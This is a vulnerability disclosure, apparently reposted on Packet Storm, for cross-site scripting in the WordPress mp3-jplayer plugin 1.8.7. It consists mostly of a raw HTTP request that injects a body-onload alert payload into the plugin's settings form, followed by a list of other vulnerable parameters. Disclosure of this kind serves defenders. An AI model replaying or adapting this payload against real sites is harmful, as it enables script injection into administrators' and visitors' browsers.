WordPress mp3-jplayer plugin version 1.8.7 suffers from a cross site scripting vulnerability.
91b07fd21c45f1692daef0821fa7179eaedefe8e444588acf5a7ee01b5f84792# ==============================================================
# Title ...| Multiple XSS in mp3-jplayer
# Version .| mp3-jplayer.1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# Multiple XSS
---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=mp3jplayer.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1441
mp3foxVol=100&make_player_from_link=true&mp3foxOnBlog=true&mp3foxTheme=styleF&mp3foxCustomStylesheet='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&mp3foxScreenOpac=&mp3foxScreenColour=&mp3foxLoadbarOpac=&mp3foxLoadbarColour=&mp3foxPosbarOpac=&mp3foxPosbarColour=&mp3foxPosbarTint=&mp3foxPlaylistOpac=&mp3foxPlaylistColour=&mp3foxPlaylistTint=&mp3foxIndicator=&mp3foxVolGrad=&mp3foxListDivider=&mp3foxScreenTextColour=&mp3foxListTextColour=&mp3foxListCurrentColour=&mp3foxListBGaCurrent=&mp3foxListHoverColour=&mp3foxListBGaHover=&mp3foxPopoutBackground=&mp3foxPopoutBGimage=&librarySortcol=file&libraryDirection=ASC&mp3foxfolder=%2F&mp3foxPlayerWidth=40%25&mp3foxFloat=none&mp3foxDownloadMp3=false&loggedout_dload_text=LOG+IN+TO+DOWNLOAD&loggedout_dload_link=http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-login.php&dload_text=DOWNLOAD+MP3&force_browser_dload=true&dloader_remote_path=&mp3foxPaddings_top=5px&mp3foxPaddings_inner=35px&mp3foxPaddings_bottom=40px&mp3foxMaxListHeight=450&mp3foxShowPlaylist=true&file_separator=%2C&caption_separator=%3B&mp3foxEnablePopout=true&mp3foxPopoutWidth=400&mp3foxPopoutMaxHeight=600&mp3foxPopoutButtonText=&mp3foxEncodeFiles=true&mp3foxAllowRemote=true&make_player_from_link_shcode=%5Bmp3j+track%3D%22%7BTEXT%7D%40%7BURL%7D%22+volslider%3D%22y%22+style%3D%22outline%22%5D&touch_punch_js=true&disableJSlibs=&update_mp3foxSettings=Update+Settings&mp3foxRemember=true&MtogBox1=false&mp3foxPluginVersion=1.8.7
---<request>---
Also vulnerable:
mp3foxScreenOpac, mp3foxScreenColour, mp3foxLoadbarOpac, mp3foxLoadbarColour, mp3foxPosbarOpac, mp3foxPosbarColour,
mp3foxPlaylistOpac, mp3foxPlaylistColour, mp3foxScreenTextColour, mp3foxListTextColour, mp3foxListCurrentColour, mp3foxListBGaCurrent, mp3foxListBGaCurrent, mp3foxListHoverColour, mp3foxListBGaHover, mp3foxPopoutBackground,
mp3foxPopoutBGimage, mp3foxPlayerWidth, mp3foxPlayerWidth, loggedout_dload_text, loggedout_dload_link, dload_text,
dloader_remote_path, mp3foxPaddings_top, mp3foxPaddings_inner, mp3foxPaddings_bottom, file_separator, caption_separator, mp3foxPopoutButtonText, make_player_from_link_shcode, MtogBox1
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed